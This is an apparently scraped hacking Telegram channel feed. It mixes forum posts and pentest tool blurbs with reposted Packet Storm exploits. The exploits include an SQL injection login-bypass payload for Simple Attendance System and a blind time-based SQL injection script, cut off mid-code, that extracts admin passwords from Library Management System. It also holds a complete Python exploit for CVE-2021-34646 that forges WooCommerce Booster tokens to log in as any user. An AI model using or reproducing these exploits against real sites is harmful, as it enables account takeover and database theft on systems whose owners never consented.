Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking on Medium
Hacking the Quick Response code


When you’re a home automation junkie πŸ€“ like me, you’ve probably scanned a product or two. QR codes makes your home automation life easier…

Continue reading on Medium Β»
https://b.thumbs.redditmedia.com/VDG7_Aeffe17ovcoKJSPeADd743EKtKTA8bvAQ3G9vY.jpg I had installed chaosvpn however I have no idea what to mail. The mailing -info is given in ubuntu request to in the chaosvpn website but I couldn't interpret it.

​

Its my ubuntu vmware

submitted by /u/VortexFlickens
[link] [comments]
hacking: security in practice
What's your host operating system?

i've been a guy who wants a stable os on host system that just works while i can pretty much do anything in a virtual machine without the fear of breaking my system.

elite linux users would hate me using "just works".

View Poll

submitted by /u/ixceyfa1con
[link] [comments]
hacking: security in practice
I can't tell if this is really stupid or actually smart

Lots of forms have certain requirements for passwords (length, inclusion of certain characters, etc) but that doesn't stop people from sharing passwords. I think if websites said "We recommend using a password that is an embarrassing truth about yourself"

The effect of this would be longer passwords which are more difficult to bruteforce and no-one would share their password if it was something like "IregularlywetthebeduntilIwas15" or something like that.

Downside is if the password does get leaked it's more embarrassing

submitted by /u/doubleredacted
[link] [comments]
Hacking on Medium
Update Your Apple Devices to Guard Against Pegasus Spyware Attacks


By NSI Visiting Fellow Sam Curry

Continue reading on The SCIF Β»
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux TutorialsReg1c1de : Registry Permission Scanner For Finding Potential Privesc Avenues Within Registry
Reg1c1de is a tool that scans specified registry hives and reports on any keys where the user has write permissions In addition, if any registry values are found that contain file paths with certain file extensions and they are writeable, these will be reported as well.

More information on this tool and it’s use can be found in the related github.io article: here

Help output:

++++++++++++++Reg1c1de++++++++++++++++
+author: @deadjakk | http://shell.rip+
++++++++++++++++++++++++++++++++++++++
Description:
Reg1c1de is a tool that scans specified registry hives and reports on any keys where the user has write permissions
In addition, if any registry values are found that contain file paths with certain file extensions and they are writeable, these will be reported as well.
These keys should be investigated further as they could potentially lead to a path to privilege escalation or other evil
Arguments: (THESE ARE ALL OPTIONAL!)
-h show this help message
-vv enable debug output (more verbose)
-e scan the entire specified hive, this is disabled by default
-o filename to write the vulnerable keys to csv, example -o=filename
-k base key to enumerate from under the hive, default=Software, example -k=Software
-df disables writeable file checking, in case you don’t want to make thousands of access denied file open attempts
-r four letter shorthand of the root hive to enumerate from, default=HKLM, example -r=HKLM
Acceptable values are: HKCU, HKLM, HKCR, HKCC, HKU
-writetests enabling this flag will enable write tests, which will write a dummy registry key and value to every discovered instance of write access to a key.
I DO NOT recommend using this, especially if you cannot make a registry backup, nevertheless it is here.
Example Usage:
Reg1c1de.exe -v -o=outputfile -r=HKLM -e


Download
On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–„ β–ˆ β–„β–„β–„β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“ β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–“ β–“β–ˆβ–ˆ β–ˆβ–ˆβ–“β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’ β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“ β–ˆβ–ˆβ–’ β–“β–’β–’β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆ β–€ β–“β–ˆβ–ˆ β–“β–ˆβ–ˆβ–’ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’ β–’ β–“β–ˆβ–ˆβ–‘ β–’β–‘β–‘β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’ β–‘ β–“β–ˆβ–ˆβ–“ β–‘ β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ β–„ β–‘β–“β–ˆβ–’ β–’β–ˆβ–ˆβ–‘ β–‘ β–β–ˆβ–ˆβ–“β–‘β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–‘β–’β–ˆβ–‘ β–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–‘ β–ˆβ–ˆβ–’β–“β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘ β–‘ β–’β–‘ β–’ β–’ β–’ β–‘β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘β–‘ β–’β–‘ β–‘ β–’ β–‘ β–‘β–‘ β–’β–‘β–“ β–ˆβ–ˆβ–’β–’β–’ β–‘ β–’ β–’β–‘ β–‘ β–‘β–‘ β–‘ β–’β–‘ β–‘ β–’ β–‘β–’β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–’ β–“β–ˆβ–ˆ β–‘β–’β–‘ β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–’ β–’ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ Different technologies and paradigms are hyperconnected and offer advances to society. The usage of other technologies among these devices makes security uneven. When facing a pentest in any environment, one major factor is the network. The network interconnects the world of the Internet of Things, the world of industrial control systems, and information technology. This README introduces the 'on-the-fly' tool, which gives capabilities to perform pentesting tests in several domains (IoT, ICS & IT). It is an innovative tool by bringing together different worlds sharing a common factor: the network.Prerequisities'on-the-fly' was written in Python and made extensive use of Scapy and netfilterqueue. It is crucial to have Scapy in Python and netfilterqueue installed with a compatible version of Python. For this, a version of Python 3 up to Python version 3.7.5 is recommended (and no higher, as there may be incompatibilities with 3.8 and 3.9 in some libraries that it uses 'on-the-fly'). There is a requirements.txt file that must be executed the first time the tool is launched using 'pip install -r requirements.txt'. Again the pip version must be oriented to a Python 3 version up to 3.7.5.pip install -r requirements.txtUsagepython on-the-fly.pyExample videoson-the-fly: MySQL_manipulation Moduleon-the-fly: SSDP_fake Moduleon-the-fly: Proxy_socks4 Moduleon-the-fly: Port_forwarding Moduleon-the-fly: MDNS_Scan ModuleContactTHE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.This software doesn't have a QA Process. This software is a Proof of Concept.If you have any problems, you can contact:ideaslocas@telefonica.comDownload On-The-Fly
Read more...
On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)
http://www.kitploit.com/2021/09/on-fly-tool-which-gives-capabilities-to.html
β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–„ β–ˆ β–„β–„β–„β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“ β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–“ β–“β–ˆβ–ˆ β–ˆβ–ˆβ–“
β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’ β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“ β–ˆβ–ˆβ–’ β–“β–’β–’β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆ β–€ β–“β–ˆβ–ˆ β–“β–ˆβ–ˆβ–’ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’
β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’ β–’ β–“β–ˆβ–ˆβ–‘ β–’β–‘β–‘β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘
β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’ β–‘ β–“β–ˆβ–ˆβ–“ β–‘ β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ β–„ β–‘β–“β–ˆβ–’ β–’β–ˆβ–ˆβ–‘ β–‘ β–β–ˆβ–ˆβ–“β–‘
β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘ β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–’β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆ β–’β–‘β–’β–ˆβ–‘ β–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–‘ β–ˆβ–ˆβ–’β–“β–‘
β–‘ β–’β–‘β–’β–‘β–’β–‘ β–‘ β–’β–‘ β–’ β–’ β–’ β–‘β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘β–‘ β–’β–‘ β–‘ β–’ β–‘ β–‘β–‘ β–’β–‘β–“ β–ˆβ–ˆβ–’β–’β–’
β–‘ β–’ β–’β–‘ β–‘ β–‘β–‘ β–‘ β–’β–‘ β–‘ β–’ β–‘β–’β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–’ β–“β–ˆβ–ˆ β–‘β–’β–‘
β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–’ β–’ β–‘β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘

Different technologies and paradigms are hyperconnected and offer advances to society. The usage of other technologies among these devices makes security uneven. When facing a pentest (https://www.kitploit.com/search/label/Pentest) in any environment, one major factor is the network. The network interconnects the world of the Internet of Things, the world of industrial control systems, and information technology. This README introduces the 'on-the-fly' tool, which gives capabilities to perform pentesting (https://www.kitploit.com/search/label/Pentesting) tests in several domains (IoT, ICS & IT). It is an innovative tool by bringing together different worlds sharing a common factor: the network.
Prerequisities
'on-the-fly' was written in Python and made extensive use of Scapy (https://www.kitploit.com/search/label/Scapy) and netfilterqueue. It is crucial to have Scapy in Python and netfilterqueue installed with a compatible version of Python. For this, a version of Python 3 (https://www.kitploit.com/search/label/Python%203) up to Python version 3.7.5 is recommended (and no higher, as there may be incompatibilities with 3.8 and 3.9 in some libraries that it uses 'on-the-fly'). There is a requirements.txt file that must be executed the first time the tool is launched using 'pip install -r requirements.txt'. Again the pip version must be oriented to a Python 3 version up to 3.7.5.pip install -r requirements.txt

Usage
python on-the-fly.py

Example videos

on-the-fly: MySQL_manipulation Module
on-the-fly: SSDP_fake Module
on-the-fly: Proxy_socks4 Module
on-the-fly: Port_forwarding Module
on-the-fly: MDNS_Scan Module
Contact
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.This software doesn't have a QA Process. This software is a Proof of Concept.If you have any problems, you can contact:ideaslocas@telefonica.com (mailto:ideaslocas@telefonica.com)

Download On-The-Fly (https://github.com/Telefonica/on-the-fly)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit CollectorSimple Attendance System 1.0 SQL Injection


Simple Attendance System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | e095fbb19fec3f896a193398a75dacad

Download



# Exploit Title: Simple Attendance System 1.0 - Authenticated bypass
# Exploit Author: Abdullah Khawaja (hax.3xploit)
# Date: September 17, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14948/simple-attendance-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/attendance_0.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
Simple Attendance System, is prone to multiple vulnerabilities.
Easy authentication bypass vulnerability on the application
allowing the attacker to login


----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/attendance/login.php

Username: admin' or ''=' -- -+
Password: admin' or ''=' -- -+


----- PoC-2: Authentication Bypass -----

Steps:
1. Enter wrong crendentials http://localhost/attendance/login.php
2. Capture the request in burp and send it to repeater.
3. Forward the request.
4. In response tab, replace :
{"status":"failed","msg":"Invalid username or password."}
with
{"status":"success","msg":"Login successfully."}




Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Exploit Collector
Cloudron 6.2 Cross Site Scripting


Cloudron version 6.2 suffers from a cross site scripting vulnerability.

MD5 | c00528f7f6eb16cf927d4aff14fb5ee8

Download



# Exploit Title: Cloudron 6.2 - Cross Site Scripting (Reflected)
# Google Dork: N/A
# Date: 10.06.2021
# Exploit Author: AkΔ±ner KΔ±sa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# Tested on: Demo / Localhost
# CVE : CVE-2021-31721

Proof of Concept:

1. Go to https://my.demo.cloudron.io/login.html?returnTo=


2. Type your payload after returnTo=

3. Fill in the login information and press the sign in button.



Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Library Management System 1.0 SQL Injection


https://2.bp.blogspot.com/-9-swdJydXNw/WWlu-Z7JktI/AAAAAAAAIJ0/CxXmre-Va7QW9KRwpgdSNcn8lp40qwLtQCLcBGAs/s1600/h117.png
Library Management System version 1.0 suffers from a remote blind time-based SQL injection vulnerability.

MD5 | d1b3bec04564901a9e4024f4c99cae47

Download
# Exploit Title: Library Management System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
# Exploit Author: Bobby Cooke (@0xBoku) & Adeeb Shah (@hyd3sec)
# Date: 16/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/12469/library-management-system-using-php-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/librarymanagement.zip
# Vendor: breakthrough2
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
# Library Management System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# Exploitation Walkthrough: https://0xboku.com/2021/09/14/0dayappsecBeginnerGuide.html
import requests,argparse
from colorama import (Fore as F, Back as B, Style as S)

BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
def bullet(char,color):
C=FB if color == 'B' else FR if color == 'R' else FG
return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
info,err,ok = bullet('-','B'),bullet('!','R'),bullet('+','G')
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

# POST /LibraryManagement/fine-student.php
# inject' UNION SELECT IF(SUBSTRING(password,1,1) = '1',sleep(1),null) FROM admin WHERE adminId=1; -- kamahamaha
def sqliPayload(char,position,userid,column,table):
sqli = 'inject\' UNION SELECT IF(SUBSTRING('
sqli += str(column)+','
sqli += str(position)+',1) = \''
sqli += str(char)+'\',sleep(1),null) FROM '
sqli += str(table)+' WHERE adminId='
sqli += str(userid)+'; -- kamahamaha'
return sqli

chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
'8','9','@','#']

def postRequest(URL,sqliReq,char,position,pxy):
sqliURL = URL
params = {"check":1,"id":sqliReq}
if pxy:
req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies,timeout=10)
else:
req = requests.post(url=sqliURL, data=params, verify=False, timeout=10)
#print("{} : {}".format(char,req.elapsed.total_seconds()))
return req.elapsed.total_seconds()

def theHarvester(target,CHARS,url,pxy):
#print("Retrieving: {} {} {}".format(target['table'],target['column'],target['id']))
position = 1
theHarvest = ""
while position < 8:
for char in CHARS:
sqliReq = sqliPayload
[...]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit CollectorWordPress WooCommerce Booster 5.4.3 Authentication Bypass


WordPress WooCommerce Booster plugin version 5.4.3 suffers from an authentication bypass vulnerability.

MD5 | 37a02e12c72652ac4ee9bb16b94742a8

Download



# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass
# Date: 2021-09-16
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
#
# Affected Plugin: Booster for WooCommerce
# Plugin Slug: woocommerce-jetpack
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/
# Affected Versions: <= 5.4.3
# Fully Patched Version: >= 5.4.4
# CVE: CVE-2021-34646
# CVSS Score: 9.8 (Critical)
# Category: webapps
#
# 1:
# Goto: https://target.com/wp-json/wp/v2/users/
# Pick a user-ID (e.g. 1 - usualy is the admin)
#
# 2:
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1
#
# 3:
# Check-Out out which of the generated links allows you to access the system
#
import requests,sys,hashlib
import argparse
import datetime
import email.utils
import calendar
import base64

B = "\033[94m"
W = "\033[97m"
R = "\033[91m"
RST = "\033[0;0m"

parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
id = str(args.id)
url = args.url
if args.url[-1] != "/": # URL needs trailing /
url = url + "/"

verify_url= url + "?wcj_user_id=" + id
r = requests.get(verify_url)

if r.status_code != 200:
print("status code != 200")
print(r.headers)
sys.exit(-1)

def email_time_to_timestamp(s):
tt = email.utils.parsedate_tz(s)
if tt is None: return None
return calendar.timegm(tt) - tt[9]

date = r.headers["Date"]
unix = email_time_to_timestamp(date)

def printBanner():
print(f"{W}Timestamp: {B}" + date)
print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")
print("We need to generate multiple timestamps in order to avoid delay related timing errors")
print("One of the following links will log you in...\n")

printBanner()



for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors
hash = hashlib.md5(str(unix-i).encode()).hexdigest()
print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")
token='{"id":"'+ id +'","code":"'+hash+'"}'
token = base64.b64encode(token.encode()).decode()
token = token.rstrip("=") # remove trailing =
link = url+"my-account/?wcj_verify_email="+token
print(link + f"\n{RST}")






Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video